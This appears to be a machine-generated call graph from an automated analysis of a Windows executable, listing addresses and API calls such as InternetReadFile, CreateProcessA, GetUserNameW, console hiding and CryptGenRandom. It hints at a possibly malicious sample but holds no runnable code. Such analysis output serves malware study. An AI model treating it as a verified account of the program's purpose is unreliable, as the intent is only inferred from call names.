109532->109534 109535 a81fc1 109532->109535 109536 a659b3 __Stoulx 20 API calls 109533->109536 109604 a72e0d 10 API calls 2 library calls 109534->109604 109537 a659b3 __Stoulx 20 API calls 109535->109537 109539 a81fa7 109536->109539 109540 a81fc6 109537->109540 109602 a65122 26 API calls __wsopen_s 109539->109602 109603 a65122 26 API calls __wsopen_s 109540->109603 109541 a81fdf MultiByteToWideChar 109544 a8200e 109541->109544 109545 a81ffe GetLastError 109541->109545 109548 a75b94 std::_Locinfo::_W_Getdays 21 API calls 109544->109548 109605 a6597d 20 API calls 3 library calls 109545->109605 109546 a80635 109546->109525 109555 a80690 109546->109555 109549 a82016 109548->109549 109550 a8203e 109549->109550 109551 a8201d MultiByteToWideChar 109549->109551 109552 a74d66 _free 20 API calls 109550->109552 109551->109550 109553 a82032 GetLastError 109551->109553 109552->109546 109606 a6597d 20 API calls 3 library calls 109553->109606 109607 a803f3 109555->109607 109558 a806db 109625 a7cc7e 109558->109625 109559 a806c2 109561 a659a0 __dosmaperr 20 API calls 109559->109561 109574 a806c7 109561->109574 109562 a806e0 109563 a806e9 109562->109563 109564 a80700 109562->109564 109565 a659a0 __dosmaperr 20 API calls 109563->109565 109638 a8035e CreateFileW 109564->109638 109568 a806ee 109565->109568 109567 a659b3 __Stoulx 20 API calls 109569 a8065d 109567->109569 109570 a659b3 __Stoulx 20 API calls 109568->109570 109569->109528 109570->109574 109571 a807b6 GetFileType 109572 a80808 109571->109572 109573 a807c1 GetLastError 109571->109573 109639 a7cbc7 109572->109639 109665 a6597d 20 API calls 3 library calls 109573->109665 109574->109567 109575 a8078b GetLastError 109664 a6597d 20 API calls 3 library calls 109575->109664 109578 a80739 109578->109571 109578->109575 109663 a8035e CreateFileW 109578->109663 109579 a807cf CloseHandle 109579->109574 109581 a807f8 109579->109581 109584 a659b3 __Stoulx 20 API calls 109581->109584 109583 a8077e 109583->109571 109583->109575 109587 a807fd 109584->109587 109586 a80875 109591 a808a2 109586->109591 109666 a80111 97 API calls 4 library calls 109586->109666 109587->109574 109590 a8089b 109590->109591 109592 a808b3 109590->109592 109667 a7595d 109591->109667 109592->109569 109594 a80931 CloseHandle 109592->109594 109682 a8035e CreateFileW 109594->109682 109596 a8095c 109597 a80992 109596->109597 109598 a80966 GetLastError 109596->109598 109597->109569 109683 a6597d 20 API calls 3 library calls 109598->109683 109600 a80972 109684 a7cd90 21 API calls 3 library calls 109600->109684 109602->109546 109603->109546 109604->109541 109605->109546 109606->109550 109608 a8042e 109607->109608 109609 a80414 109607->109609 109685 a80383 109608->109685 109609->109608 109611 a659b3 __Stoulx 20 API calls 109609->109611 109612 a80423 109611->109612 109692 a65122 26 API calls __wsopen_s 109612->109692 109614 a80466 109615 a80495 109614->109615 109617 a659b3 __Stoulx 20 API calls 109614->109617 109622 a804e8 109615->109622 109694 a7046e 26 API calls 2 library calls 109615->109694 109619 a8048a 109617->109619 109618 a804e3 109620 a80562 109618->109620 109618->109622 109693 a65122 26 API calls __wsopen_s 109619->109693 109695 a6514f 11 API calls _abort 109620->109695 109622->109558 109622->109559 109624 a8056e 109626 a7cc8a __FrameHandler3::FrameUnwindToState 109625->109626 109697 a6c20b EnterCriticalSection 109626->109697 109628 a7ccd8 109698 a7cd87 109628->109698 109629 a7ccb6 109701 a7ca5d 21 API calls 3 library calls 109629->109701 109630 a7cc91 109630->109628 109630->109629 109635 a7cd24 EnterCriticalSection 109630->109635 109633 a7cd01 __wsopen_s 109633->109562 109634 a7ccbb 109634->109628 109702 a7cba4 EnterCriticalSection 109634->109702 109635->109628 109636 a7cd31 LeaveCriticalSection 109635->109636 109636->109630 109638->109578 109640 a7cbd6 109639->109640 109641 a7cc3f 109639->109641 109640->109641 109647 a7cbfc __wsopen_s 109640->109647 109642 a659b3 __Stoulx 20 API calls 109641->109642 109643 a7cc44 109642->109643 109644 a659a0 __dosmaperr 20 API calls 109643->109644 109645 a7cc2c 109644->109645 109645->109586 109648 a8056f 109645->109648 109646 a7cc26 SetStdHandle 109646->109645 109647->109645 109647->109646 109649 a80599 109648->109649 109657 a80595 109648->109657 109650 a78ff6 __fread_nolock 28 API calls 109649->109650 109649->109657 109651 a805ab 109650->109651 109652 a805bb 109651->109652 109653 a805d1 109651->109653 109654 a659a0 __dosmaperr 20 API calls 109652->109654 109655 a78aa3 __fread_nolock 38 API calls 109653->109655 109661 a805c0 109654->109661 109656 a805e3 109655->109656 109662 a805f9 109656->109662 109704 a83441 88 API calls 6 library calls 109656->109704 109657->109586 109658 a659b3 __Stoulx 20 API calls 109658->109657 109659 a78ff6 __fread_nolock 28 API calls 109659->109661 109661->109657 109661->109658 109662->109659 109662->109661 109663->109583 109664->109574 109665->109579 109666->109590 109668 a7ce21 __wsopen_s 26 API calls 109667->109668 109669 a7596d 109668->109669 109670 a75973 109669->109670 109672 a759a5 109669->109672 109674 a7ce21 __wsopen_s 26 API calls 109669->109674 109705 a7cd90 21 API calls 3 library calls 109670->109705 109672->109670 109675 a7ce21 __wsopen_s 26 API calls 109672->109675 109673 a759cb 109676 a759ed 109673->109676 109706 a6597d 20 API calls 3 library calls 109673->109706 109677 a7599c 109674->109677 109678 a759b1 CloseHandle 109675->109678 109676->109569 109680 a7ce21 __wsopen_s 26 API calls 109677->109680 109678->109670 109681 a759bd GetLastError 109678->109681 109680->109672 109681->109670 109682->109596 109683->109600 109684->109597 109687 a8039b 109685->109687 109686 a803b6 109686->109614 109687->109686 109688 a659b3 __Stoulx 20 API calls 109687->109688 109689 a803da 109688->109689 109696 a65122 26 API calls __wsopen_s 109689->109696 109691 a803e5 109691->109614 109692->109608 109693->109615 109694->109618 109695->109624 109696->109691 109697->109630 109703 a6c253 LeaveCriticalSection 109698->109703 109700 a7cd8e 109700->109633 109701->109634 109702->109628 109703->109700 109704->109662 109705->109673 109706->109676 109707 9c6808 InternetReadFile 109708 9c6800 SimpleUString::operator= 109707->109708 109708->109707 109714 9c62ad ctype 109708->109714 109724 9ebba0 28 API calls 5 library calls 109708->109724 109710 9c69cd 109725 a65132 109710->109725 109712 9c62fb ctype 109717 a405bb 109712->109717 109714->109710 109714->109712 109716 9c66b2 109718 a405c4 109717->109718 109719 a405c6 IsProcessorFeaturePresent 109717->109719 109718->109716 109721 a417a9 109719->109721 109730 a4176d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 109721->109730 109723 a4188c 109723->109716 109724->109708 109731 a650a7 26 API calls 4 library calls 109725->109731 109727 a65141 109732 a6514f 11 API calls _abort 109727->109732 109729 a6514e 109730->109723 109731->109727 109732->109729 109733 a65182 109757 a76b4b 109733->109757 109736 a651be 109737 a651c2 109736->109737 109738 a651df 109736->109738 109741 a651d4 109737->109741 109760 a76e62 109737->109760 109738->109741 109744 a659b3 __Stoulx 20 API calls 109738->109744 109739 a65277 109770 a6514f 11 API calls _abort 109739->109770 109745 a74d66 _free 20 API calls 109741->109745 109742 a65281 109746 a651fb 109744->109746 109747 a65263 109745->109747 109748 a659b3 __Stoulx 20 API calls 109746->109748 109749 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 109747->109749 109750 a65202 109748->109750 109751 a65273 109749->109751 109752 a659b3 __Stoulx 20 API calls 109750->109752 109753 a6521c 109752->109753 109753->109741 109754 a65231 109753->109754 109755 a659b3 __Stoulx 20 API calls 109753->109755 109754->109741 109756 a659b3 __Stoulx 20 API calls 109754->109756 109755->109754 109756->109741 109771 a768de 109757->109771 109759 a651ae 109759->109736 109759->109739 109761 a76e6e 109760->109761 109762 a76e7c 109760->109762 109815 a76da2 28 API calls 4 library calls 109761->109815 109763 a81f96 __wsopen_s 31 API calls 109762->109763 109766 a76e8d 109763->109766 109765 a76e78 109765->109741 109767 a76e93 109766->109767 109816 a76da2 28 API calls 4 library calls 109766->109816 109769 a74d66 _free 20 API calls 109767->109769 109769->109765 109770->109742 109772 a768ea __FrameHandler3::FrameUnwindToState 109771->109772 109779 a6c20b EnterCriticalSection 109772->109779 109774 a768f5 109780 a76939 109774->109780 109778 a76925 __wsopen_s 109778->109759 109779->109774 109781 a76948 109780->109781 109782 a7695b 109780->109782 109783 a659b3 __Stoulx 20 API calls 109781->109783 109782->109781 109784 a7696e 109782->109784 109785 a7694d 109783->109785 109802 a769de 77 API calls 109784->109802 109801 a65122 26 API calls __wsopen_s 109785->109801 109788 a76911 109798 a76930 109788->109798 109789 a76977 __Getctype 109789->109788 109790 a769b5 109789->109790 109791 a769a2 109789->109791 109803 a721c2 109790->109803 109793 a659b3 __Stoulx 20 API calls 109791->109793 109793->109788 109795 a769d1 109812 a6514f 11 API calls _abort 109795->109812 109797 a769dd 109814 a6c253 LeaveCriticalSection 109798->109814 109800 a76937 109800->109778 109801->109788 109802->109789 109804 a721cf 109803->109804 109806 a721dd 109803->109806 109804->109806 109810 a721f4 109804->109810 109805 a659b3 __Stoulx 20 API calls 109807 a721e5 109805->109807 109806->109805 109813 a65122 26 API calls __wsopen_s 109807->109813 109809 a721ef 109809->109788 109809->109795 109810->109809 109811 a659b3 __Stoulx 20 API calls 109810->109811 109811->109807 109812->109797 109813->109809 109814->109800 109815->109765 109816->109767 109817 a776c2 109818 a776d2 109817->109818 109819 a776ea 109817->109819 109820 a659b3 __Stoulx 20 API calls 109818->109820 109819->109818 109826 a77701 _strrchr 109819->109826 109821 a776d7 109820->109821 109926 a65122 26 API calls __wsopen_s 109821->109926 109823 a777b2 _strrchr 109824 a77802 109823->109824 109825 a777d8 109823->109825 109829 a74d09 __Getctype 20 API calls 109824->109829 109827 a76e62 33 API calls 109825->109827 109826->109823 109826->109826 109927 a74d09 109826->109927 109828 a777df 109827->109828 109831 a777f8 109828->109831 109863 a778dd 109828->109863 109832 a7781c 109829->109832 109838 a74d66 _free 20 API calls 109831->109838 109835 a77824 109832->109835 109839 a721c2 ___std_type_info_name 26 API calls 109832->109839 109844 a74d66 _free 20 API calls 109835->109844 109836 a7776a 109840 a74d66 _free 20 API calls 109836->109840 109837 a77778 109841 a721c2 ___std_type_info_name 26 API calls 109837->109841 109842 a776e2 109838->109842 109843 a77838 109839->109843 109840->109842 109845 a77786 109841->109845 109846 a77843 109843->109846 109847 a778d0 109843->109847 109844->109831 109845->109847 109936 a76be9 109845->109936 109849 a659b3 __Stoulx 20 API calls 109846->109849 109945 a6514f 11 API calls _abort 109847->109945 109856 a77853 109849->109856 109851 a778dc 109853 a721c2 ___std_type_info_name 26 API calls 109853->109856 109854 a74d66 _free 20 API calls 109854->109823 109855 a76e62 33 API calls 109855->109856 109856->109853 109856->109855 109857 a7789b 109856->109857 109858 a7788f 109856->109858 109859 a659b3 __Stoulx 20 API calls 109857->109859 109860 a74d66 _free 20 API calls 109858->109860 109861 a778a0 109859->109861 109860->109831 109862 a778dd 71 API calls 109861->109862 109862->109835 109864 a77903 109863->109864 109865 a778eb 109863->109865 109864->109865 109868 a7790f 109864->109868 109869 a77919 109864->109869 109866 a659b3 __Stoulx 20 API calls 109865->109866 109867 a778f0 109866->109867 109954 a65122 26 API calls __wsopen_s 109867->109954 109871 a659a0 __dosmaperr 20 API calls 109868->109871 109946 a823d6 109869->109946 109871->109865 109874 a77957 109951 a7769a 109874->109951 109875 a77940 109876 a74d66 _free 20 API calls 109875->109876 109878 a77948 109876->109878 109880 a74d66 _free 20 API calls 109878->109880 109883 a778fb 109880->109883 109881 a77991 109884 a74d66 _free 20 API calls 109881->109884 109882 a779b9 109885 a659a0 __dosmaperr 20 API calls 109882->109885 109883->109831 109886 a77999 109884->109886 109887 a779ca ListArray 109885->109887 109888 a74d66 _free 20 API calls 109886->109888 109890 a779db CreateProcessA 109887->109890 109889 a779a4 109888->109889 109891 a74d66 _free 20 API calls 109889->109891 109892 a77a3d 109890->109892 109893 a77a18 GetLastError 109890->109893 109891->109883 109895 a77afb 109892->109895 109896 a77a49 109892->109896 109955 a6597d 20 API calls 3 library calls 109893->109955 109956 a60f95 60 API calls _abort 109895->109956 109897 a77a83 109896->109897 109898 a77a4d WaitForSingleObject GetExitCodeProcess 109896->109898 109904 a77ac4 109897->109904 109905 a77a88 109897->109905 109901 a77a73 109898->109901 109902 a77a6c CloseHandle 109898->109902 109899 a77a24 109906 a77a30 109899->109906 109907 a77a29 CloseHandle 109899->109907 109908 a77a77 CloseHandle 109901->109908 109914 a77a7e 109901->109914 109902->109901 109903 a77b02 109909 a77acf 109904->109909 109910 a77ac8 CloseHandle 109904->109910 109911 a77a93 109905->109911 109912 a77a8c CloseHandle 109905->109912 109913 a77a34 CloseHandle 109906->109913 109906->109914 109907->109906 109908->109914 109915 a74d66 _free 20 API calls 109909->109915 109910->109909 109911->109914 109916 a77a97 CloseHandle 109911->109916 109912->109911 109913->109914 109917 a74d66 _free 20 API calls 109914->109917 109918 a77ad7 109915->109918 109916->109914 109919 a77aa8 109917->109919 109920 a74d66 _free 20 API calls 109918->109920 109921 a74d66 _free 20 API calls 109919->109921 109922 a77ae3 109920->109922 109923 a77ab4 109921->109923 109925 a74d66 _free 20 API calls 109922->109925 109924 a74d66 _free 20 API calls 109923->109924 109924->109883 109925->109883 109926->109842 109928 a74d16 109927->109928 109929 a74d56 109928->109929 109930 a74d41 HeapAlloc 109928->109930 109935 a74d2a std::_Locinfo::_W_Getdays 109928->109935 109932 a659b3 __Stoulx 19 API calls 109929->109932 109931 a74d54 109930->109931 109930->109935 109933 a74d5b 109931->109933 109932->109933 109933->109836 109933->109837 109935->109929 109935->109930 109999 a6cfdd 7 API calls 2 library calls 109935->109999 109937 a76c05 109936->109937 109939 a76bf7 109936->109939 109938 a659b3 __Stoulx 20 API calls 109937->109938 109944 a76c0d 109938->109944 109939->109937 109941 a76c2e 109939->109941 109942 a76c17 109941->109942 109943 a659b3 __Stoulx 20 API calls 109941->109943 109942->109847 109942->109854 109943->109944 110000 a65122 26 API calls __wsopen_s 109944->110000 109945->109851 109957 a8205d 109946->109957 109949 a74d66 _free 20 API calls 109950 a77936 109949->109950 109950->109874 109950->109875 109975 a77649 109951->109975 109953 a776be 109953->109881 109953->109882 109954->109883 109955->109899 109956->109903 109958 a82079 109957->109958 109958->109958 109959 a74d09 __Getctype 20 API calls 109958->109959 109960 a820a7 109959->109960 109961 a820af 109960->109961 109962 a820c3 109960->109962 109973 a6597d 20 API calls 3 library calls 109961->109973 109965 a721c2 ___std_type_info_name 26 API calls 109962->109965 109969 a820bc 109962->109969 109970 a82118 109962->109970 109964 a820b6 109967 a659b3 __Stoulx 20 API calls 109964->109967 109965->109962 109966 a74d66 _free 20 API calls 109968 a8210e 109966->109968 109967->109969 109968->109949 109969->109966 109974 a6514f 11 API calls _abort 109970->109974 109972 a82124 109973->109964 109974->109972 109976 a77655 __FrameHandler3::FrameUnwindToState 109975->109976 109983 a6c20b EnterCriticalSection 109976->109983 109978 a77663 109984 a77b03 109978->109984 109982 a77681 __wsopen_s 109982->109953 109983->109978 109985 a77b2c 109984->109985 109986 a77b6a 109985->109986 109987 a77b58 109985->109987 109989 a74d09 __Getctype 20 API calls 109986->109989 109988 a659b3 __Stoulx 20 API calls 109987->109988 109990 a77670 109988->109990 109991 a77b7e 109989->109991 109995 a7768e 109990->109995 109992 a659b3 __Stoulx 20 API calls 109991->109992 109994 a77b8c 109991->109994 109992->109994 109993 a74d66 _free 20 API calls 109993->109990 109994->109993 109998 a6c253 LeaveCriticalSection 109995->109998 109997 a77698 109997->109982 109998->109997 109999->109935 110000->109942 110001 a40daf 110002 a40dbb __FrameHandler3::FrameUnwindToState 110001->110002 110031 a40a3e 110002->110031 110004 a40f1b 110825 a41968 4 API calls 2 library calls 110004->110825 110006 a40dc2 110006->110004 110008 a40dec 110006->110008 110007 a40f22 110826 a60fe3 60 API calls _abort 110007->110826 110019 a40e2b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 110008->110019 110042 a70429 110008->110042 110010 a40f28 110827 a60f95 60 API calls _abort 110010->110827 110014 a40f30 110015 a40e0b 110017 a40e8c 110052 a6fe16 110017->110052 110019->110017 110821 a60fab 64 API calls 3 library calls 110019->110821 110021 a40e92 110056 9dc170 110021->110056 110025 a40eb3 110025->110007 110026 a40eb7 110025->110026 110027 a40ec0 110026->110027 110823 a60f86 60 API calls _abort 110026->110823 110824 a40bc4 13 API calls 2 library calls 110027->110824 110030 a40ec9 110030->110015 110032 a40a47 110031->110032 110828 a41105 IsProcessorFeaturePresent 110032->110828 110034 a40a53 110829 a5a1f6 10 API calls 3 library calls 110034->110829 110036 a40a58 110037 a40a5c 110036->110037 110830 a70309 110036->110830 110037->110006 110040 a40a73 110040->110006 110044 a70440 110042->110044 110043 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110045 a40e05 110043->110045 110044->110043 110045->110015 110046 a703cd 110045->110046 110047 a70418 110046->110047 110049 a703fc 110046->110049 110048 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110047->110048 110050 a70425 110048->110050 110049->110047 110845 9b1960 110049->110845 110050->110019 110053 a6fe1f 110052->110053 110054 a6fe24 110052->110054 111014 a6fb5d 82 API calls 110053->111014 110054->110021 111015 a41740 110056->111015 110059 9dc1d4 110060 9e1800 collate 28 API calls 110059->110060 110062 9dc201 110060->110062 110061 9e1940 28 API calls 110061->110062 110062->110061 110063 9dc239 110062->110063 110064 9e1c10 _MREFOpen@16 28 API calls 110063->110064 110065 9dc24a 110064->110065 112263 9d68a0 326 API calls 11 library calls 110065->112263 110067 9dc24f 110068 9e1ac0 collate 26 API calls 110067->110068 110070 9dc264 110068->110070 110069 9dc415 110077 9de585 110069->110077 111020 9b8780 110069->111020 110073 9dc269 110070->110073 110072 9dc3fd SetErrorMode SetConsoleTitleW 111017 9c58e0 EnumWindows 110072->111017 110073->110069 110073->110072 110075 9dc510 111057 9c2870 110075->111057 110078 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110077->110078 110080 9de59f 110078->110080 110822 a41a87 GetModuleHandleW 110080->110822 110081 9dc432 110081->110075 111038 9e1360 110081->111038 110099 9dc4cf 110101 9e1ac0 collate 26 API calls 110099->110101 110103 9dc4de 110101->110103 110106 9b8780 97 API calls 110103->110106 110108 9dc4f6 110106->110108 110110 9e1ac0 collate 26 API calls 110108->110110 110112 9dc501 110110->110112 110114 9e1ac0 collate 26 API calls 110112->110114 110114->110075 110821->110017 110822->110025 110823->110027 110824->110030 110825->110007 110826->110010 110827->110014 110828->110034 110829->110036 110834 a7c98d 110830->110834 110833 a5a21f 8 API calls 3 library calls 110833->110037 110837 a7c9aa 110834->110837 110838 a7c9a6 110834->110838 110835 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110836 a40a65 110835->110836 110836->110040 110836->110833 110837->110838 110840 a73b5d 110837->110840 110838->110835 110844 a73b64 110840->110844 110841 a73ba7 GetStdHandle 110841->110844 110842 a73c0f 110842->110837 110843 a73bba GetFileType 110843->110844 110844->110841 110844->110842 110844->110843 110852 a1e660 110845->110852 110847 9b198c 110861 a14900 110847->110861 110851 9b19b5 110851->110049 110884 9f4760 110852->110884 110854 a1e697 110907 a4089a 110854->110907 110857 9f4760 28 API calls 110858 a1e70b 110857->110858 110915 9e6670 110858->110915 110859 a1e725 ListArray 110859->110847 110862 a14942 110861->110862 110863 a1493e 110861->110863 111005 a17f30 24 API calls 4 library calls 110862->111005 110865 9f4760 28 API calls 110863->110865 110866 a14961 110865->110866 110974 a14230 CryptAcquireContextA 110866->110974 110868 a14970 110991 a147f0 110868->110991 110870 a1497c CryptGenRandom 110871 a149e4 110870->110871 110872 a1498a 110870->110872 110873 9e1bd0 _MREFOpen@16 28 API calls 110871->110873 110874 a1499c CryptReleaseContext 110872->110874 110878 a149a5 110872->110878 110875 a149f1 110873->110875 110874->110878 111006 a14390 30 API calls 4 library calls 110875->111006 110877 a14a01 111007 a57e0c RaiseException 110877->111007 110880 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110878->110880 110882 9b19ab 110880->110882 110881 a14a0f 110883 a40c27 29 API calls __onexit 110882->110883 110883->110851 110885 9f47b6 110884->110885 110889 9f4791 110884->110889 110886 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110885->110886 110887 9f47ce 110886->110887 110887->110854 110888 9f47ac 110888->110885 110891 9f4802 110888->110891 110889->110885 110889->110888 110890 9f47d4 110889->110890 110927 9e1bd0 110890->110927 110892 9e1bd0 _MREFOpen@16 28 API calls 110891->110892 110895 9f480f 110892->110895 110933 9f4f50 28 API calls _MREFOpen@16 110895->110933 110898 9f47f4 110932 a57e0c RaiseException 110898->110932 110899 9f4822 110934 a57e0c RaiseException 110899->110934 110902 9f4830 110935 a57afd 27 API calls 2 library calls 110902->110935 110904 9f4887 110936 9e1c10 110904->110936 110906 9f48a9 110906->110854 110909 a4089f 110907->110909 110910 a1e6f1 110909->110910 110912 a408bb ListArray 110909->110912 110961 a6ac7c 110909->110961 110968 a6cfdd 7 API calls 2 library calls 110909->110968 110910->110857 110910->110859 110969 a57e0c RaiseException 110912->110969 110914 a41b6e 110916 9e66d1 110915->110916 110917 9e669f 110915->110917 110919 9e1bd0 _MREFOpen@16 28 API calls 110916->110919 110918 9e66a3 110917->110918 110971 a17ec0 30 API calls 3 library calls 110917->110971 110918->110859 110920 9e66de 110919->110920 110972 9b5930 28 API calls _MREFOpen@16 110920->110972 110923 9e66bd 110923->110859 110924 9e66f1 110973 a57e0c RaiseException 110924->110973 110926 9e66ff 110928 9e1bf0 110927->110928 110947 9e1800 110928->110947 110930 9e1c02 110931 9f4f50 28 API calls _MREFOpen@16 110930->110931 110931->110898 110932->110891 110933->110899 110934->110902 110935->110904 110937 9e1c36 110936->110937 110938 9e1c3d 110937->110938 110939 9e1c96 110937->110939 110940 9e1c73 110937->110940 110938->110906 110942 9e1c8b codecvt 110939->110942 110944 a4089a ListArray 22 API calls 110939->110944 110941 a4089a ListArray 22 API calls 110940->110941 110943 9e1c84 110941->110943 110942->110906 110943->110942 110945 a65132 messages 26 API calls 110943->110945 110944->110942 110946 9e1cd3 110945->110946 110950 9e181e SimpleUString::operator= 110947->110950 110952 9e1844 110947->110952 110948 9e192e 110960 9edba0 28 API calls SimpleUString::operator= 110948->110960 110950->110930 110952->110948 110953 9e18bd 110952->110953 110954 9e1898 110952->110954 110956 a4089a ListArray 22 API calls 110953->110956 110959 9e18a9 codecvt 110953->110959 110955 a4089a ListArray 22 API calls 110954->110955 110955->110959 110956->110959 110957 a65132 messages 26 API calls 110957->110948 110958 9e1910 ctype 110958->110930 110959->110957 110959->110958 110966 a75b94 std::_Locinfo::_W_Getdays 110961->110966 110962 a75bd2 110964 a659b3 __Stoulx 20 API calls 110962->110964 110963 a75bbd RtlAllocateHeap 110965 a75bd0 110963->110965 110963->110966 110964->110965 110965->110909 110966->110962 110966->110963 110970 a6cfdd 7 API calls 2 library calls 110966->110970 110968->110909 110969->110914 110970->110966 110971->110923 110972->110924 110973->110926 110975 a142a6 110974->110975 110976 a1427b GetLastError CryptAcquireContextA 110974->110976 110978 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 110975->110978 110976->110975 110977 a14295 CryptAcquireContextA 110976->110977 110977->110975 110979 a142c4 SetLastError 110977->110979 110980 a142c0 110978->110980 110981 9e1bd0 _MREFOpen@16 28 API calls 110979->110981 110980->110868 110982 a142d8 110981->110982 111008 a14390 30 API calls 4 library calls 110982->111008 110984 a142eb 111009 a57e0c RaiseException 110984->111009 110986 a142f9 111010 a57afd 27 API calls 2 library calls 110986->111010 110988 a14347 110989 9e1c10 _MREFOpen@16 28 API calls 110988->110989 110990 a14369 110989->110990 110990->110868 110992 a148b7 110991->110992 111001 a14835 110991->111001 111011 a4079a 5 API calls __Init_thread_wait 110992->111011 110994 a148c1 110994->111001 111012 a40c27 29 API calls __onexit 110994->111012 110995 a4089a ListArray 22 API calls 110996 a14845 110995->110996 110998 a14230 35 API calls 110996->110998 111002 a1485d 110996->111002 110998->111002 110999 a148e5 111013 a40750 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 110999->111013 111001->110995 111003 a14880 ctype 111001->111003 111002->111003 111004 a14877 CryptReleaseContext 111002->111004 111003->110870 111004->111003 111005->110863 111006->110877 111007->110881 111008->110984 111009->110986 111010->110988 111011->110994 111012->110999 111013->111001 111014->110054 111016 9dc18c GetConsoleWindow ShowWindow 111015->111016 111016->110059 111016->110073 111018 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111017->111018 111019 9c5912 111018->111019 111019->110069 111021 9b87e1 111020->111021 111022 9b87f8 111021->111022 111023 9b8863 111021->111023 111025 9e1800 collate 28 API calls 111022->111025 112434 a654b9 111023->112434 111033 9b8812 111025->111033 111026 9b88a8 112454 a64cff 111026->112454 111027 9b883c ctype 111028 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111027->111028 111030 9b885f 111028->111030 111030->110081 111032 9b8918 111034 a65132 messages 26 API calls 111032->111034 111033->111027 111033->111032 111036 9b891d 111034->111036 111035 9b8875 111035->111026 111037 a654b9 28 API calls 111035->111037 112449 9e1940 111035->112449 111037->111035 111039 9e13ae 111038->111039 111040 9e138a 111038->111040 112730 9e8080 28 API calls SimpleUString::operator= 111039->112730 111042 9e1800 collate 28 API calls 111040->111042 111044 9dc495 111042->111044 111043 9e13b3 111045 9e9040 111044->111045 111046 9e9050 111045->111046 111046->111046 112731 9ee160 111046->112731 111048 9dc4ab 111049 9e9580 111048->111049 111050 9e1940 28 API calls 111049->111050 111051 9dc4c1 111050->111051 111052 9e1ac0 111051->111052 111053 9e1acb 111052->111053 111054 9e1ae6 ctype 111052->111054 111053->111054 111055 a65132 messages 26 API calls 111053->111055 111054->110099 111056 9e1b0a 111055->111056 111058 9e1800 collate 28 API calls 111057->111058 111059 9c28c1 111058->111059 111060 9e1c10 _MREFOpen@16 28 API calls 111059->111060 111061 9c28d7 111060->111061 112741 9c1bc0 111061->112741 111063 9c299f ctype 111064 9e1800 collate 28 API calls 111063->111064 111066 9c29ce 111064->111066 111065 9c30d0 111068 a65132 messages 26 API calls 111065->111068 111069 9e1c10 _MREFOpen@16 28 API calls 111066->111069 111067 9c28e9 ctype 111067->111063 111067->111065 111070 9c30f3 111068->111070 111071 9c29e4 111069->111071 111072 9c1bc0 30 API calls 111071->111072 111074 9c29f6 ctype 111072->111074 111073 9e1800 collate 28 API calls 111075 9c2adb 111073->111075 111074->111073 111076 9e1c10 _MREFOpen@16 28 API calls 111075->111076 111077 9c2af1 111076->111077 111078 9c1bc0 30 API calls 111077->111078 111081 9c2b03 ctype 111078->111081 111079 9ea4d0 28 API calls 111080 9c2bf5 111079->111080 111082 9e1800 collate 28 API calls 111080->111082 111081->111079 111083 9c2c21 111082->111083 111084 9e1c10 _MREFOpen@16 28 API calls 111083->111084 111085 9c2c33 111084->111085 111086 9c1bc0 30 API calls 111085->111086 111089 9c2c42 ctype 111086->111089 111087 9ea5b0 28 API calls 111088 9c2d13 111087->111088 112817 9e6c20 111088->112817 111089->111087 111091 9c2d30 111092 9ea4d0 28 API calls 111091->111092 111093 9c2d62 111092->111093 111094 9e1800 collate 28 API calls 111093->111094 111095 9c2d8b 111094->111095 111096 9e1c10 _MREFOpen@16 28 API calls 111095->111096 111097 9c2d9d 111096->111097 111098 9c1bc0 30 API calls 111097->111098 111101 9c2dac ctype 111098->111101 111099 9ea5b0 28 API calls 111100 9c2e7d 111099->111100 111102 9e6c20 SimpleUString::operator= 28 API calls 111100->111102 111101->111099 111103 9c2e9a 111102->111103 111104 9e1800 collate 28 API calls 111103->111104 111105 9c2ebf 111104->111105 111106 9e1c10 _MREFOpen@16 28 API calls 111105->111106 111107 9c2ed2 111106->111107 111108 9c1bc0 30 API calls 111107->111108 111110 9c2ee1 ctype 111108->111110 111109 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111111 9c30cc GetModuleFileNameW 111109->111111 111110->111109 111112 9e1260 111111->111112 111113 9e1282 111112->111113 111114 9e6c20 SimpleUString::operator= 28 API calls 111113->111114 111115 9dc53b 111114->111115 111116 9c36f0 GetUserNameW 111115->111116 111117 9c3760 111116->111117 111118 9e6c20 SimpleUString::operator= 28 API calls 111117->111118 111119 9c3782 111118->111119 111120 9e6c20 SimpleUString::operator= 28 API calls 111119->111120 111121 9c37ae 111120->111121 111122 9ea4d0 28 API calls 111121->111122 111123 9c37e6 111122->111123 111124 9e1800 collate 28 API calls 111123->111124 111127 9c380f ctype 111124->111127 111125 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 111126 9c38b5 111129 a65132 messages 26 API calls 111126->111129 111127->111126 111130 9c3892 ctype 111127->111130 111130->111125 112263->110067 112435 a653f4 